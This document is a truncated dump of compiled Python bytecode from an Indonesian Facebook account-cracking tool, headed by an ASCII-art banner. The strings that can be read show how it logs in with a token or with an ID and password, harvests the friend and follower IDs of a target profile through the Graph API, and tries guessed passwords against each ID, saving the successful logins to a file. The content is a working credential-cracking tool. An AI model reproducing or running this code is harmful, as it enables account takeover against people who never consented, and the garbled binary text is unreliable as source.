\xe2\x84\xa2\n\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x97\x8d\xe2\x9e\xa4 COMUNITAS\n\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x97\x8d\xe2\x9e\xa4 GARANGAN\n\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x97\x8d\xe2\x9e\xa4 ALAY\n\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x97\x8d\xe2\x9e\xa4 INDONESIA\n\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x97\x8d\xe2\x9e\xa4 C.G.A.I\n\n===============================================\n\n\xe2\x97\x8d\xe2\x9e\xa4 Codded By : \xe2\x98\x86 RAKA \xe2\x98\x86 \xe2\x84\xa2\xef\xb8\xbb\xc2\xae\xe2\x95\xa4\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\x90\xe2\x97\x8d\xe2\x9e\xa4\n\xe2\x97\x8d\xe2\x9e\xa4 Facebook : Raka Andrian Tara\n\xe2\x97\x8d\xe2\x9e\xa4 Instagram : raka_andrian27\n\xe2\x97\x8d\xe2\x9e\xa4 Youtube : YouTube Channel Bangsat-XD\n\n===============================================" | lolcat(\x02\x00\x00\x00t\x02\x00\x00\x00ost\x06\x00\x00\x00system(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x04\x00\x00\x00logo5\x00\x00\x00s\x02\x00\x00\x00\x00\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s=\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHd\x03\x00GHd\x02\x00GHd\x04\x00GHd\x05\x00GHd\x02\x00GHt\x03\x00\x83\x00\x00\x01d\x00\x00S(\x06\x00\x00\x00NR\x01\x00\x00\x00t\x00\x00\x00\x00s$\x00\x00\x00\t \x1b[1;34mClone Method Menu\x1b[0;97ms\x17\x00\x00\x00\x1b[1;96m[1] B-api (Fast)s\x14\x00\x00\x00\x1b[1;96m[2] Localhost(\x04\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00t\x12\x00\x00\x00method_menu_select(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x0b\x00\x00\x00method_menu7\x00\x00\x00s\x12\x00\x00\x00\x00\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sR\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r"\x00t\x01\x00\x83\x00\x00\x01n,\x00|\x00\x00d\x03\x00k\x02\x00r8\x00t\x02\x00\x83\x00\x00\x01n\x16\x00d\x04\x00GHd\x05\x00GHd\x04\x00GHt\x03\x00\x83\x00\x00\x01d\x00\x00S(\x06\x00\x00\x00Ns\x13\x00\x00\x00 Choose method >>> t\x01\x00\x00\x001t\x01\x00\x00\x002R\t\x00\x00\x00s\'\x00\x00\x00\t \x1b[1;35mSelect valid option \x1b[0;97m(\x04\x00\x00\x00t\t\x00\x00\x00raw_inputt\x06\x00\x00\x00b_menut\x06\x00\x00\x00l_menuR\n\x00\x00\x00(\x01\x00\x00\x00t\x04\x00\x00\x00afza(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R\n\x00\x00\x00A\x00\x00\x00s\x12\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sI\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHd\x03\x00t\x03\x00\x17d\x04\x00\x17t\x04\x00\x17GHd\x02\x00GHd\x05\x00GHd\x06\x00GHd\x02\x00GHt\x05\x00\x83\x00\x00\x01d\x00\x00S(\x07\x00\x00\x00NR\x01\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\r\x00\x00\x00FB Login MenusH\x00\x00\x00\x1b[1;92m[1] \xe2\x98\x86 ENTER TOKEN \xe2\x98\x86 \xe2\x84\xa2\xef\xb8\xbb\xc2\xae\xe2\x95\xa4\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\x90\xe2\x97\x8d\xe2\x9e\xa4s\x18\x00\x00\x00\x1b[1;92m[2] ID/Pass login(\x06\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00t\x01\x00\x00\x00ct\x02\x00\x00\x00c2t\x0c\x00\x00\x00login_select(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x05\x00\x00\x00loginL\x00\x00\x00s\x12\x00\x00\x00\x00\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x07\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00sR\x01\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\x16\x01t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHd\x05\x00GHd\x04\x00GHt\x00\x00d\x06\x00\x83\x01\x00}\x01\x00t\x04\x00d\x07\x00d\x08\x00\x83\x02\x00}\x02\x00|\x02\x00j\x05\x00|\x01\x00\x83\x01\x00\x01|\x02\x00j\x06\x00\x83\x00\x00\x01yl\x00t\x07\x00j\x08\x00d\t\x00|\x01\x00\x17\x83\x01\x00}\x03\x00t\t\x00j\n\x00|\x03\x00j\x0b\x00\x83\x01\x00}\x04\x00|\x04\x00d\n\x00\x19}\x05\x00|\x05\x00j\x0c\x00d\x0b\x00\x83\x01\x00d\x0c\x00\x19}\x06\x00d\x04\x00GHd\r\x00|\x06\x00\x17d\x0e\x00\x17GHt\r\x00j\x0e\x00d\x0f\x00\x83\x01\x00\x01t\x0f\x00\x83\x00\x00\x01WqN\x01\x04t\x10\x00t\x11\x00f\x02\x00k\n\x00r\x12\x01\x01\x01\x01d\x04\x00GHd\x10\x00GHd\x04\x00GHt\x00\x00d\x11\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01qN\x01Xn8\x00|\x00\x00d\x12\x00k\x02\x00r,\x01t\x13\x00\x83\x00\x00\x01n"\x00d\x04\x00GHd\x13\x00t\x14\x00\x17d\x14\x00\x17t\x15\x00\x17GHd\x04\x00GHt\x16\x00\x83\x00\x00\x01d\x00\x00S(\x15\x00\x00\x00Ns\x19\x00\x00\x00 Choose login method >>> R\x0c\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s!\x00\x00\x00\t \x1b[1;32mFB Token Login\x1b[0;97ms\x19\x00\x00\x00\x1b[1;95mPast token here : s\r\x00\x00\x00.fb_token.txtt\x01\x00\x00\x00ws+\x00\x00\x00https://graph.facebook.com/me?access_token=t\x04\x00\x00\x00namet\x01\x00\x00\x00 i\x00\x00\x00\x00s\x1d\x00\x00\x00\t\x1b[1;32mToken logged in as : s\x07\x00\x00\x00\x1b[0;97mi\x03\x00\x00\x00s"\x00\x00\x00\t \x1b[1;31mToken not valid\x1b[0;97ms \x00\x00\x00\x1b[1;92mPress enter to try again R\r\x00\x00\x00s\x05\x00\x00\x00\t s\x13\x00\x00\x00Select valid method(\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00t\x04\x00\x00\x00opent\x05\x00\x00\x00writet\x05\x00\x00\x00closet\x08\x00\x00\x00requestst\x03\x00\x00\x00gett\x04\x00\x00\x00jsont\x05\x00\x00\x00loadst\x04\x00\x00\x00textt\x06\x00\x00\x00rsplitt\x04\x00\x00\x00timet\x05\x00\x00\x00sleepR\x0b\x00\x00\x00t\x08\x00\x00\x00KeyErrort\x07\x00\x00\x00IOErrorR\x15\x00\x00\x00t\x08\x00\x00\x00login_fbR\x12\x00\x00\x00R\x13\x00\x00\x00R\x14\x00\x00\x00(\x07\x00\x00\x00R\x11\x00\x00\x00t\x05\x00\x00\x00tokent\x07\x00\x00\x00token_st\x01\x00\x00\x00rt\x01\x00\x00\x00qR\x17\x00\x00\x00t\x02\x00\x00\x00nm(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R\x14\x00\x00\x00V\x00\x00\x00s@\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x0f\x01\r\x01\n\x01\x03\x01\x13\x01\x12\x01\n\x01\x13\x01\x05\x01\r\x01\r\x01\x0b\x01\x13\x01\x05\x01\x05\x01\x05\x01\n\x01\x0e\x01\x0c\x01\n\x02\x05\x01\x11\x01\x05\x01c\x00\x00\x00\x00\x08\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00sw\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHd\x03\x00GHd\x02\x00GHt\x03\x00d\x04\x00\x83\x01\x00}\x00\x00|\x00\x00j\x04\x00d\x05\x00d\x02\x00\x83\x02\x00}\x01\x00|\x01\x00j\x04\x00d\x06\x00d\x02\x00\x83\x02\x00}\x02\x00|\x02\x00j\x04\x00d\x07\x00d\x02\x00\x83\x02\x00}\x03\x00t\x03\x00d\x08\x00\x83\x01\x00}\x04\x00d\x02\x00GHt\x05\x00j\x06\x00d\t\x00|\x03\x00\x17d\n\x00\x17|\x04\x00\x17d\x0b\x00t\x07\x00\x83\x01\x01j\x08\x00}\x05\x00t\t\x00j\n\x00|\x05\x00\x83\x01\x00}\x06\x00d\x0c\x00|\x06\x00k\x06\x00r\x1d\x01t\x0b\x00d\r\x00d\x0e\x00\x83\x02\x00}\x07\x00|\x07\x00j\x0c\x00|\x06\x00d\x0c\x00\x19\x83\x01\x00\x01|\x07\x00j\r\x00\x83\x00\x00\x01t\x05\x00j\x0e\x00d\x0f\x00|\x06\x00d\x0c\x00\x19\x17\x83\x01\x00\x01t\x0f\x00j\x10\x00d\x10\x00\x83\x01\x00\x01d\x11\x00GHt\x0f\x00j\x10\x00d\x10\x00\x83\x01\x00\x01t\x11\x00\x83\x00\x00\x01nV\x00d\x12\x00|\x06\x00d\x13\x00\x19k\x06\x00rX\x01d\x14\x00GHd\x02\x00GHt\x0f\x00j\x10\x00d\x10\x00\x83\x01\x00\x01t\x03\x00d\x15\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x1b\x00d\x16\x00GHd\x02\x00GHt\x03\x00d\x15\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01d\x00\x00S(\x17\x00\x00\x00NR\x01\x00\x00\x00R\t\x00\x00\x00s#\x00\x00\x00\t \x1b[1;32mFB ID/PASS Login\x1b[0;97ms\x0f\x00\x00\x00 ID/Mail/Num : R\x18\x00\x00\x00t\x01\x00\x00\x00(t\x01\x00\x00\x00)s\x0e\x00\x00\x00 Password : s\x1e\x00\x00\x00http://localhost:5000/auth?id=s\x06\x00\x00\x00&pass=t\x07\x00\x00\x00headerst\x03\x00\x00\x00locs\r\x00\x00\x00.fb_token.txtR\x16\x00\x00\x00sG\x00\x00\x00https://graph.facebook.com/me/friends?uid=100000395779504&access_token=i\x01\x00\x00\x00s)\x00\x00\x00\t \x1b[1;31mLogged in successfully\x1b[0;97ms\x10\x00\x00\x00www.facebook.comt\x05\x00\x00\x00errors8\x00\x00\x00\t \x1b[1;31mUser must verify account before login\x1b[0;97ms \x00\x00\x00\x1b[1;93mPress enter to try again s.\x00\x00\x00\t\x1b[1;31mID/Number/Password may be wrong\x1b[0;97m(\x13\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x0e\x00\x00\x00t\x07\x00\x00\x00replaceR\x1c\x00\x00\x00R\x1d\x00\x00\x00t\x06\x00\x00\x00headerR \x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R\x19\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00t\x04\x00\x00\x00postR"\x00\x00\x00R#\x00\x00\x00R\x0b\x00\x00\x00R&\x00\x00\x00(\x08\x00\x00\x00t\x02\x00\x00\x00idt\x03\x00\x00\x00id1t\x03\x00\x00\x00id2t\x03\x00\x00\x00uidt\x03\x00\x00\x00pwdt\x04\x00\x00\x00dataR*\x00\x00\x00t\x05\x00\x00\x00hamza(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R&\x00\x00\x00x\x00\x00\x00s@\x00\x00\x00\x00\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x12\x01\x12\x01\x12\x01\x0c\x01\x05\x01$\x01\x0f\x01\x0c\x01\x0f\x01\x11\x01\n\x01\x15\x01\r\x01\x05\x01\r\x01\n\x01\x10\x01\x05\x01\x05\x01\r\x01\n\x01\n\x02\x05\x01\x05\x01\n\x01c\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xad\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01y\x19\x00t\x03\x00d\x02\x00d\x03\x00\x83\x02\x00j\x04\x00\x83\x00\x00a\x05\x00Wn\x1e\x00\x04t\x06\x00t\x07\x00f\x02\x00k\n\x00rM\x00\x01\x01\x01t\x08\x00\x83\x00\x00\x01n\x01\x00XyL\x00t\t\x00j\n\x00d\x04\x00t\x05\x00\x17\x83\x01\x00}\x00\x00t\x0b\x00j\x0c\x00|\x00\x00j\r\x00\x83\x01\x00}\x01\x00|\x01\x00d\x05\x00\x19}\x02\x00|\x02\x00j\x0e\x00d\x06\x00\x83\x01\x00d\x07\x00\x19}\x03\x00|\x03\x00}\x04\x00Wn\x9d\x00\x04t\x06\x00t\x07\x00f\x02\x00k\n\x00r\xef\x00\x01\x01\x01d\x08\x00GHd\t\x00t\x0f\x00\x17d\n\x00\x17t\x10\x00\x17GHd\x08\x00GHt\x00\x00j\x01\x00d\x0b\x00\x83\x01\x00\x01t\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01nK\x00\x04t\t\x00j\x13\x00j\x14\x00k\n\x00r9\x01\x01\x01\x01t\x02\x00\x83\x00\x00\x01d\x08\x00GHd\r\x00GHd\x08\x00GHt\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00\x01t\x15\x00d\x0e\x00\x83\x01\x00\x01t\x16\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x08\x00GHd\x0f\x00t\x0f\x00\x17d\x10\x00\x17|\x04\x00\x17t\x10\x00\x17GHd\x08\x00GHt\x00\x00j\x01\x00d\x11\x00\x83\x01\x00\x01d\x08\x00GHd\x12\x00GHd\x13\x00GHd\x14\x00GHd\x15\x00GHd\x16\x00GHd\x17\x00GHd\x08\x00GHt\x17\x00\x83\x00\x00\x01d\x00\x00S(\x18\x00\x00\x00NR\x01\x00\x00\x00s\r\x00\x00\x00.fb_token.txtR)\x00\x00\x00s+\x00\x00\x00https://graph.facebook.com/me?access_token=R\x17\x00\x00\x00R\x18\x00\x00\x00i\x00\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\x11\x00\x00\x00ID has checkpoints\x14\x00\x00\x00rm -rf .fb_token.txti\x01\x00\x00\x00s;\x00\x00\x00\t \x1b[1;31m\xe2\x9d\xa4\xef\xb8\x8fTurn on mobile data OR wifi\xe2\x9d\xa4\xef\xb8\x8f \x1b[0;97ms\'\x00\x00\x00\x1b[1;93mPress enter to try again \x1b[0;97ms\x03\x00\x00\x00\t s\x0e\x00\x00\x00Logged In UsersA\x00\x00\x00echo -e "-----------------------------------------------"| lolcats\x1f\x00\x00\x00\x1b[1;93m[1] Crack from public ids\x1f\x00\x00\x00\x1b[1;93m[2] Crack from followerss\x15\x00\x00\x00\x1b[1;93m[3] View tokens\x1d\x00\x00\x00\x1b[1;93m[4] Find date of births\x1d\x00\x00\x00\x1b[1;93m[5] Return method menus\x11\x00\x00\x00\x1b[1;93m[6] Logout(\x18\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x19\x00\x00\x00t\x04\x00\x00\x00readR\'\x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R\x15\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R!\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00R"\x00\x00\x00R#\x00\x00\x00t\n\x00\x00\x00exceptionsR\x02\x00\x00\x00R\x0e\x00\x00\x00R\x0f\x00\x00\x00t\r\x00\x00\x00b_menu_select(\x05\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R+\x00\x00\x00t\x03\x00\x00\x00nmft\x02\x00\x00\x00ok(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R\x0f\x00\x00\x00\x9a\x00\x00\x00sT\x00\x00\x00\x00\x02\r\x01\x07\x01\x03\x01\x19\x01\x13\x01\x0b\x01\x03\x01\x13\x01\x12\x01\n\x01\x13\x01\n\x01\x13\x01\x05\x01\x11\x01\x05\x01\r\x01\r\x01\n\x01\x13\x01\x07\x01\x05\x01\x05\x01\x05\x01\r\x01\n\x01\x0b\x01\r\x01\x07\x01\x05\x01\x15\x01\x05\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x06\x00\x00\x00\x03\x00\x00\x00s\x9d\x04\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00g\x00\x00}\x01\x00g\x00\x00\x89\x01\x00g\x00\x00\x89\x00\x00|\x00\x00d\x02\x00k\x02\x00r\xb0\x01t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x05\x00\x83\x01\x00\x01d\x04\x00GHt\x00\x00d\x06\x00\x83\x01\x00}\x02\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x07\x00\x83\x01\x00\x01d\x04\x00GHyi\x00t\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\t\x00\x17t\x06\x00\x17\x83\x01\x00}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x04\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x05\x00\x83\x01\x00\x01d\x04\x00GHd\n\x00|\x04\x00d\x0b\x00\x19\x17GHWn7\x00\x04t\n\x00t\x0b\x00f\x02\x00k\n\x00r.\x01\x01\x01\x01d\x04\x00GHd\x0c\x00GHd\x04\x00GHt\x00\x00d\r\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\x0e\x00\x17t\x06\x00\x17\x83\x01\x00}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x05\x00xm\x02|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\r\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0e\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01qg\x01Wn\x1c\x02|\x00\x00d\x14\x00k\x02\x00rR\x03t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x15\x00\x83\x01\x00\x01d\x04\x00GHt\x00\x00d\x16\x00\x83\x01\x00}\x02\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x07\x00\x83\x01\x00\x01d\x04\x00GHyo\x00t\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\t\x00\x17t\x06\x00\x17d\x17\x00t\x0f\x00\x83\x01\x01}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x04\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x15\x00\x83\x01\x00\x01d\x04\x00GHd\x18\x00|\x04\x00d\x0b\x00\x19\x17GHWn7\x00\x04t\n\x00t\x0b\x00f\x02\x00k\n\x00r\xc6\x02\x01\x01\x01d\x04\x00GHd\x0c\x00GHd\x04\x00GHt\x00\x00d\r\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\x19\x00\x17t\x06\x00\x17d\x1a\x00\x17d\x17\x00t\x0f\x00\x83\x01\x01}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x05\x00x\xcb\x00|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\r\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0e\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01q\t\x03Wnz\x00|\x00\x00d\x1b\x00k\x02\x00rh\x03t\x10\x00\x83\x00\x00\x01nd\x00|\x00\x00d\x1c\x00k\x02\x00r~\x03t\x11\x00\x83\x00\x00\x01nN\x00|\x00\x00d\x1d\x00k\x02\x00r\x94\x03t\x12\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x1e\x00k\x02\x00r\xaa\x03t\x13\x00\x83\x00\x00\x01n"\x00d\x04\x00GHd\x1f\x00t\x14\x00\x17d \x00\x17t\x15\x00\x17GHd\x04\x00GHt\x16\x00\x83\x00\x00\x01d!\x00t\x17\x00t\x18\x00|\x01\x00\x83\x01\x00\x83\x01\x00\x17GHt\x19\x00j\x1a\x00d"\x00\x83\x01\x00\x01d#\x00GHd\x04\x00GHd$\x00d%\x00\x14GHd\x04\x00GH\x87\x00\x00\x87\x01\x00f\x02\x00d&\x00\x86\x00\x00}\n\x00t\x1b\x00d\'\x00\x83\x01\x00}\x0b\x00|\x0b\x00j\x1c\x00|\n\x00|\x01\x00\x83\x02\x00\x01d\x11\x00GHd$\x00d%\x00\x14GHd\x04\x00GHd(\x00GHd)\x00t\x17\x00t\x18\x00\x88\x00\x00\x83\x01\x00\x83\x01\x00\x17d*\x00\x17t\x17\x00t\x18\x00\x88\x01\x00\x83\x01\x00\x83\x01\x00\x17GHd\x04\x00GHd$\x00d%\x00\x14GHd\x04\x00GHt\x00\x00d+\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01d\x00\x00S(,\x00\x00\x00Ns\x13\x00\x00\x00\nChoose Option >>> R\x0c\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s(\x00\x00\x00echo -e "\t CRACK Public ID " | lolcats\x16\x00\x00\x00\x1b[1;93mPut Id/user : s.\x00\x00\x00echo -e "\t Gathering Information " | lolcats\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s\x15\x00\x00\x00\x1b[1;93mTarget user : R\x17\x00\x00\x00s0\x00\x00\x00\n\t \x1b[1;31m Logged in id has checkpoint\x1b[0;97ms\x15\x00\x00\x00\nPress enter to back s\x16\x00\x00\x00/friends?access_token=R9\x00\x00\x00R4\x00\x00\x00R\x18\x00\x00\x00i\x00\x00\x00\x00t\x01\x00\x00\x00|R\r\x00\x00\x00s*\x00\x00\x00echo -e "\t Followers Cloning " | lolcats\x15\x00\x00\x00\x1b[1;92mPut Id/user : R.\x00\x00\x00s\x0e\x00\x00\x00Target user : s\x1a\x00\x00\x00/subscribers?access_token=s\x0b\x00\x00\x00&limit=5000t\x01\x00\x00\x003t\x01\x00\x00\x004t\x01\x00\x00\x005t\x01\x00\x00\x006s\x05\x00\x00\x00\t s\x13\x00\x00\x00Select valid methods\r\x00\x00\x00Total IDs : g\x00\x00\x00\x00\x00\x00\xe0?s:\x00\x00\x00\x1b[1;94mSILAHKAN DI TUNGGU process is running in backgroundi/\x00\x00\x00t\x01\x00\x00\x00-c\x01\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x13\x00\x00\x00sE\x07\x00\x00|\x00\x00}\x01\x00|\x01\x00j\x00\x00d\x01\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00y\x1c\x07|\x03\x00d\x02\x00\x17}\x04\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x04\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xd0\x00d\t\x00GHd\n\x00t\x07\x00d\x0b\x00\x19\x17GHd\x0c\x00|\x01\x00\x17GHd\r\x00|\x04\x00\x17d\x0e\x00\x17GHt\x08\x00d\x0f\x00d\x10\x00\x83\x02\x00}\x07\x00|\x07\x00j\t\x00d\x11\x00|\x01\x00\x17d\x12\x00\x17|\x04\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\x07\x00j\n\x00\x83\x00\x00\x01nf\x06d\x13\x00|\x06\x00k\x06\x00r\x18\x01d\x14\x00GHd\x15\x00t\x07\x00d\x0b\x00\x19\x17GHd\x16\x00|\x01\x00\x17GHd\x17\x00|\x04\x00\x17d\x0e\x00\x